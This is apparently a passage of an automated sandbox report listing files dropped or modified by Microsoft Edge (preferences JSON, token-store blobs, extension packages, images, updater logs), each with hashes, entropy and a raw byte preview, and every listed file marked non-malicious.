                                                                                                                                                                                    Preview:...._+jE.`..}....S..1....G}s..E....y".Wh.^.W.H...-...#.A...KR...9b........>k......bU.IVo...D......Y..[l.yx.......'c=..I0.....E.d...-...1 ....m../C...OQ.........qW..<:N.....38.u..X-..s....<..U.,Mi..._.......`.Y/.........^..,.E..........j@..G8..N.... ..Ea...4.+.79k.!T.-5W..!..@+..!.P..LDG.....V."....L.... .(#..$..&......C.....%A.T}....K_.S..'Q.".d....s....(j.D!......Ov..)*d0)."(..%..-..G..L.}....i.....m9;.....t.w..0....f?..-..M.c.3.....N7K.T..D>.3.x...z..u$5!..4..T.....U.O^L{.5..=E..'..;.}(|.6.:..f!.>...?M.8......P.D.J.I4.<...*.y.E....>....i%.6..Y.@..n.....M..r..C.f.;..<..0.H...F....h.......HB1]1....u..:...H..k....B.Q..J...@}j~.#...'Y.J~....I...ub.&..L[z..1.W/.Ck....M.......[.......N.F..z*.{nZ~d.V.4.u.K.V.......X.<p..cz..>*....X...W..da3(..g..Z$.L4.j=~.p.l.\.[e.&&.Y ...U)..._.^r0.,.{_......`S..[....(.\..p.bt.g..%.$+....f.....d....Im..f...W ......G..i_8a..ae..7....pS.....z-H..A.s.4.3..O.r.....u.S......a.}..v.-/..... ...a.x#./:...sS&U.().xL...pg
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):86
                                                                                                                                                                                    Entropy (8bit):4.389669793590032
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:YQ3JYq9xSs0dMEJAELJ25AmIpozQOn:YQ3Kq9X0dMgAEiLIMn
                                                                                                                                                                                    MD5:03B6D5E81A4DC4D4E6C27BE1E932B9D9
                                                                                                                                                                                    SHA1:3C5EF0615314BDB136AB57C90359F1839BDD5C93
                                                                                                                                                                                    SHA-256:73B017F7C5ECD629AD41D14147D53F7D3D070C5967E1E571811A6DB39F06EACC
                                                                                                                                                                                    SHA-512:0037EB23CCDBDDE93CFEB7B9A223D59D0872D4EC7F5E3CA4F7767A7301E96E1AF1175980DC4F08531D5571AFB94DF789567588DEB2D6D611C57EE4CC05376547
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{"user_experience_metrics.stability.exited_cleanly":true,"variations_crash_streak":15}
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:modified
                                                                                                                                                                                    Size (bytes):23907
                                                                                                                                                                                    Entropy (8bit):6.048100436988889
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:384:7tMkaMJH2m8qVT8IeQ0I5t0b9MEFdsNwhvkJ5ZCRfT35ub/Y3jFd4J:xMkbJrT8IeQc5d1mJ5ZCRfL5uTY3JS
                                                                                                                                                                                    MD5:919FEA06D0C8F5A4F0FC0A5AEE5FA74D
                                                                                                                                                                                    SHA1:E6597DD4B05CBB68C4C05AED5DCFE61873805250
                                                                                                                                                                                    SHA-256:218842AC9F3D42A31E8D45128FCB39617C35B3B79BBA5C8BB445908030154A0B
                                                                                                                                                                                    SHA-512:2990931B6EB69FE06FBE4C3D35C879B7A169C30BAF906C6D8ABC238A99B9753572DE9AA40889356936EE6E9728A88B06EBFE73BFFF39B96DD7490CF9849E8C9A
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","apps_count_check_time":"13380906602124790","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_redirect_origin":"","last_seen_whats_new_page_version":"117.0.2045.47"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1736433006"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5G
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):2278
                                                                                                                                                                                    Entropy (8bit):3.857490324403283
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:uiTrlKxrgxT+Cxl9Il8ud/qSyTe8ozyhN0y/mPr4VfiwCeBBd1rc:msY7/qJUm0y/mP8tzi
                                                                                                                                                                                    MD5:F12F2E4C264B9171E3B66E77317DFB80
                                                                                                                                                                                    SHA1:31F019C563740108CE9402389B75625590AED69B
                                                                                                                                                                                    SHA-256:EBC91AFC9BAFFE7A15E711455AF3782B2A3CC79415B3E418D5646D2206056155
                                                                                                                                                                                    SHA-512:E5799EFCDBC5F0110EB403426616667834B416D43AB67A840FE8BAE58EAFD53A33B669A01521C46CD41F04741F9D61DA45293A91DAE2F2AFE175B48656656D9B
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".W.i.p.w.W.M.+.N.H.l.b.C.D.m.s.Z.p.8.S.O.s.j.h.t.F.B.s.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".g.H.x.n.W.6.t.i.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.v.A.i.u.d.9.
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):4622
                                                                                                                                                                                    Entropy (8bit):3.99856548272792
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:uiTrlKxExkxD9Il8udq3WVFludRoX7cnY69CALmVuJ9n8jI7juXYSyLQKYGxFg4Y:eY7qGvQd6w9BAV6wHK3jgoAjzflNVv1
                                                                                                                                                                                    MD5:23462B3B7B66512FB5C3ECC211BF3404
                                                                                                                                                                                    SHA1:E0FEC79BE6ECFCDD9EE2873EB833F6674F3FA645
                                                                                                                                                                                    SHA-256:27126FB7798F665C1EF9FA69D1AE00D650D4619A17738441AA6C414F226B4AFF
                                                                                                                                                                                    SHA-512:F7D531E144381345A1C0C7CDCCF98A375FBA4465335CF1AC528F159E11DF7E3EDE4132B4294A5771E602D39D7548135217600FFB62472BCEE6FD53DF2FBCBF31
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".z.3.U.T.q.T.b.3.7./.u.z.h.i.f.l.b.4.0.f.z.h.D.r.E.s.w.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".k.n.g.7.Q.a.N.i.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.w.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.v.A.i.u.d.9.
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):2684
                                                                                                                                                                                    Entropy (8bit):3.902441647981975
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:uiTrlKx68Wa7xSxl9Il8udm5jwzHHOpIIPKRUISlka+ZKanUATjRl7jJKIdzU5m6:agY7m90sv5E//XjJg
                                                                                                                                                                                    MD5:EEA8DABED372349731E3A7EE144A7E4E
                                                                                                                                                                                    SHA1:A555F4ED8D9C83E5569938B2EBBCD3C82F94B36C
                                                                                                                                                                                    SHA-256:9089010D957A72E1585895813B457C31A431879480385BD6FCE020506024E2D5
                                                                                                                                                                                    SHA-512:E27D76640137D939D5E9C2B3E2688555FF2ACA97E4E9FA826AFF4BDF4BB12896EE2C9FDBCFCBD56B778F5B7C82CB6A9C0729DAD94E6D3CB7F7F519E10A7193B4
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".6.N.3.U.y.9.n.A.U.E.q.s.5.u.9.6.E./.o.g.0.E./.V.J.A.g.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".t.W.0.P.c.n.S.B.3.A.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.v.A.i.u.d.9.
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:very short file (no magic)
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):1
                                                                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:L:L
                                                                                                                                                                                    MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                    SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                    SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                    SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:.
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:Google Chrome extension, version 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):154477
                                                                                                                                                                                    Entropy (8bit):7.835886983924039
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3072:edP3YiyHk53xr3zWwaFYgn5JFug0HjaHNK7XeSD/r/pLbWNiOAo1np:edPYJHAzyVu7HjacuSD/rBPBOJnp
                                                                                                                                                                                    MD5:14937B985303ECCE4196154A24FC369A
                                                                                                                                                                                    SHA1:ECFE89E11A8D08CE0C8745FF5735D5EDAD683730
                                                                                                                                                                                    SHA-256:71006A5311819FEF45C659428944897184880BCDB571BF68C52B3D6EE97682FF
                                                                                                                                                                                    SHA-512:1D03C75E4D2CD57EEE7B0E93E2DE293B41F280C415FB2446AC234FC5AFD11FE2F2FCC8AB9843DB0847C2CE6BD7DF7213FCF249EA71896FBF6C0696E3F5AEE46C
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:Cr24..............0.."0...*.H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.q*Ba/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.|.X.M..u..s[.*..?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.*1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[........%0............G.m.}...CG.....a.s.:.S..QiI.fT.k.MdOF.2....D...v`m...M.7'.R.d...8....2..~.<w8!.W..Sg.._A6.(.pC..w.=..!..7h!J...].....3......Kf..k...|....6./.p.....A....e.1.y.<~Mu..+(v8W........?=.V+.Gb&...u8)...=Qt...... ......x.}.f..&X.SN9e..L....[0Y0...*.H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...G0E.!....~..E...Au.C.q..y.?2An.a..Zn}. H~.vtgI...o.|.j.e....p.........".&...........Z]o.H..+..zF.......S.E}@.F..".P`...3......jW....H.H...:..8.......<...........Z.e.>..vV.......J.,/.X.....?.%.....6....m#.u].Z...[.s.M_...J.."9l..l...,|.....r...QC.....4:....wj.O...5....s.n.%.....y....c.....#F........)gv(..!S
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:very short file (no magic)
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):1
                                                                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:L:L
                                                                                                                                                                                    MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                    SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                    SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                    SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:.
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):353
                                                                                                                                                                                    Entropy (8bit):5.361883809427224
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:6:YE4Ix1CsC5P56s/u4Ix1WWaSEQOJEGRLQJjDrwv/u4Ix1Q/sp56s/C:YsCsCZ56s/SWRSEQA0Dkv/SQ/sp56s/C
                                                                                                                                                                                    MD5:FAAD6F94F56F975C7AE0F83B2024483D
                                                                                                                                                                                    SHA1:4C0207564C93D04FFC2218AD71A3753B362D45DC
                                                                                                                                                                                    SHA-256:E94668AAEF01CF95C61C917D7E2DC29766083AB266A1A730B2E438BB777B7CB5
                                                                                                                                                                                    SHA-512:A663A2A3C826A15296FFB7422EE5B7B82C8235C001E59D0FA2CE5DEE86469FEAA1A90260353ADCF60D0C263A15EC5A1B730626007738A6D3BDA7F74706923168
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{"logTime": "0109/143007", "correlationVector":"1rG4O3HI4AMhYswOKHvjvZ","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "0109/143007", "correlationVector":"A7086B23F32B4FFFA882138C21125081","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "0109/143007", "correlationVector":"QGEo5esaVdlRa1fjLy4ReO","action":"EXTENSION_UPDATER", "result":""}.
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1366x720, components 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):31335
                                                                                                                                                                                    Entropy (8bit):7.694019108205432
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:768:514ugFV0910SWyR5kNVdS3sNp/xm3MbiMuYEDlyFUyv6E/ty8:5WcDWyRKNVd2M/IxMuYEDlymsTQ8
                                                                                                                                                                                    MD5:6B72597205C77D3E40E1A35BEE403801
                                                                                                                                                                                    SHA1:6BECEE055C6E057AF9475B6D651B4EE561D02F20
                                                                                                                                                                                    SHA-256:C899297FBDFC88C1634B1145A087FDB5BE17172FD786C078B299557B22F06DEB
                                                                                                                                                                                    SHA-512:7CB1A98E0C7FBB349D9CB681233A9F4ED22A1C3FAADCDF1BC270B04BD97D3FC41AB6F762B2F5F231281D63D96AC3D243640BA81D5E8CCD9F54486B4F538CA8B4
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:......Exif..II*.................Ducky.......2......Adobe.d...........................................................#"""#''''''''''..................................................!! !!''''''''''........V.."....................................................................................!1..AQ..aq."2....R..T....Br.#S.U..b..3Cs...t6.c.$D.5uV...4d.E&....%F......................!1..AQaq....."2......BRbr3CS....#..4.............?......1f.n..T......TP....E...........P.....@.........E..@......E.P........@........E.....P.P..A@@.E..@.P.P..AP.P..AP..@....T..AP.E..P.Z .. ....."... .....7.H...w.....t.....T....M.."... P..n.n..t5..*B.P..*(.................*.....................( ..................*.. .".... .".......(.. .".....*.. ....o......E.6... ..*..."........."J......Ah......@.@@....:@{6..wCp..3...((.(......................*...@..(...."....................*......*.. ........T.......@.@@........AP.P..@.E@....E@.d.E@.@@..@.P.T..@..@..P.D...@M........EO..."...=.wCp.....R......P.@......
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:Google Chrome extension, version 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):11185
                                                                                                                                                                                    Entropy (8bit):7.951995436832936
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                                                                                                                    MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                                                                                                                    SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                                                                                                                    SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                                                                                                                    SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:Cr24..............0.."0...*.H.............0.........N.......E#......9e.u.q...VYY..@.+.C..k.O..bK.`..6.G..%.....3Z...e _.6....F..1p..K.Z......./ .3...OT..`..0...Y...FT..43.th.y...}....p.L...2S.&i.`..o...f.oH.....N..:..ijT.3.F{.0.,.f?'f.CQt;b_"Pc.. ..~S.I.c.8Z.;.....{G.a......k...>.`.o..%.$>;.....g.............jg?.R..@.:..........&..{...x@.Py..;kT....%F".S..w...N....9...A..@X.t!i.@..1;......1E..X.....[.~$....J......;=T.;)k..Y...$......S......M.P..P..>..=..u.....2p...w.9..1qw.a\A..Vj .C.....A..Cf1.r6.A...L. _m...[..l.Wr_../.. .B..9!.!+..ZG.K.......0.."0...*.H.............0.........^SUd%Q.L].......Cl2o...\[.....'*...;R=....N.C5....d. .....J.C>u.kr..Y..syJC.XS.q..E.n?....(G.5..)2.G..!.M.SS.{..U....!.EE..M[.#qs.A.1...g)nQ.c..G....Bd..7... .O.BI..KXQ..4.d.K.0......g.....-p....Z.E{...M&.~n.TE7..{0....5.#.C+3.y)pd9.e.........@..3.9..B.....I....2nX........2.?.~..S....]G.N.....Lr.O.Ve....9..D1.G..W)...P.?=.#..7.R.lz..a.wX.e..h.h.~....v..RP.@X....d.G
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:Google Chrome extension, version 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):154477
                                                                                                                                                                                    Entropy (8bit):7.835886983924039
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3072:edP3YiyHk53xr3zWwaFYgn5JFug0HjaHNK7XeSD/r/pLbWNiOAo1np:edPYJHAzyVu7HjacuSD/rBPBOJnp
                                                                                                                                                                                    MD5:14937B985303ECCE4196154A24FC369A
                                                                                                                                                                                    SHA1:ECFE89E11A8D08CE0C8745FF5735D5EDAD683730
                                                                                                                                                                                    SHA-256:71006A5311819FEF45C659428944897184880BCDB571BF68C52B3D6EE97682FF
                                                                                                                                                                                    SHA-512:1D03C75E4D2CD57EEE7B0E93E2DE293B41F280C415FB2446AC234FC5AFD11FE2F2FCC8AB9843DB0847C2CE6BD7DF7213FCF249EA71896FBF6C0696E3F5AEE46C
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:Cr24..............0.."0...*.H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.q*Ba/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.|.X.M..u..s[.*..?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.*1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[........%0............G.m.}...CG.....a.s.:.S..QiI.fT.k.MdOF.2....D...v`m...M.7'.R.d...8....2..~.<w8!.W..Sg.._A6.(.pC..w.=..!..7h!J...].....3......Kf..k...|....6./.p.....A....e.1.y.<~Mu..+(v8W........?=.V+.Gb&...u8)...=Qt...... ......x.}.f..&X.SN9e..L....[0Y0...*.H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...G0E.!....~..E...Au.C.q..y.?2An.a..Zn}. H~.vtgI...o.|.j.e....p.........".&...........Z]o.H..+..zF.......S.E}@.F..".P`...3......jW....H.H...:..8.......<...........Z.e.>..vV.......J.,/.X.....?.%.....6....m#.u].Z...[.s.M_...J.."9l..l...,|.....r...QC.....4:....wj.O...5....s.n.%.....y....c.....#F........)gv(..!S
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):4982
                                                                                                                                                                                    Entropy (8bit):7.929761711048726
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:96:L7Rf7U1ylWb3KfyEfOXE+PIcvBirQFiAql1ZwKREkXCSAk:pTvWqfD+gl0sAql1u7kySAk
                                                                                                                                                                                    MD5:913064ADAAA4C4FA2A9D011B66B33183
                                                                                                                                                                                    SHA1:99EA751AC2597A080706C690612AEEEE43161FC1
                                                                                                                                                                                    SHA-256:AFB4CE8882EF7AE80976EBA7D87F6E07FCDDC8E9E84747E8D747D1E996DEA8EB
                                                                                                                                                                                    SHA-512:162BF69B1AD5122C6154C111816E4B87A8222E6994A72743ED5382D571D293E1467A2ED2FC6CC27789B644943CF617A56DA530B6A6142680C5B2497579A632B5
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:.PNG........IHDR..............>a....=IDATx..]}...U..;...O.Q..QH.I(....v..E....GUb*..R[.4@%..hK..B..(.B..". ....&)U#.%...jZ...JC.8.....{.cfvgf.3;.....}ow.....{...P.B...*T.P.B...*Tx...=.Q..wv.w.....|.e.1.$.P.?..l_\.n.}...~.g.....Q...A.f....m.....{,...C2 %..X.......FE.1.N..f...Q..D.K87.....:g..Q.{............3@$.8.....{.....q....G.. .....5..y......)XK..F...D.......... ."8...J#.eM.i....H.E.....a.RIP.`......)..T.....! .[p`X.`..L.a....e. .T..2.....H..p$..02...j....\..........s{...Ymm~.a........f.$./.[.{..C.2:.0..6..]....`....NW.....0..o.T..$;k.2......_...k..{,.+........{..6...L..... .dw...l$..}...K...EV....0......P...e....k....+Go....qw.9.1...X2\..qfw0v.....N...{...l.."....f.A..I..+#.v....'..~E.N-k.........{...l.$..ga..1...$......x$X=}.N..S..B$p..`..`.ZG:c..RA.(.0......Gg.A.I..>...3u.u........_..KO.m.........C...,..c.......0...@_..m...-..7.......4LZ......j@.......\..'....u. QJ.:G..I`.w'B0..w.H..'b.0- ......|..}./.....e..,.K.1........W.u.v. ...\.o
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):908
                                                                                                                                                                                    Entropy (8bit):4.512512697156616
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:12:1HASvgMTCBxNB+kCIww3v+BBJ/wjsV8lCBxeBeRiGTCSU8biHULaBg/4srCBhUJJ:1HAkkJ+kCIwEg/wwbw0PXa22QLWmSDg
                                                                                                                                                                                    MD5:12403EBCCE3AE8287A9E823C0256D205
                                                                                                                                                                                    SHA1:C82D43C501FAE24BFE05DB8B8F95ED1C9AC54037
                                                                                                                                                                                    SHA-256:B40BDE5B612CFFF936370B32FB0C58CC205FC89937729504C6C0B527B60E2CBA
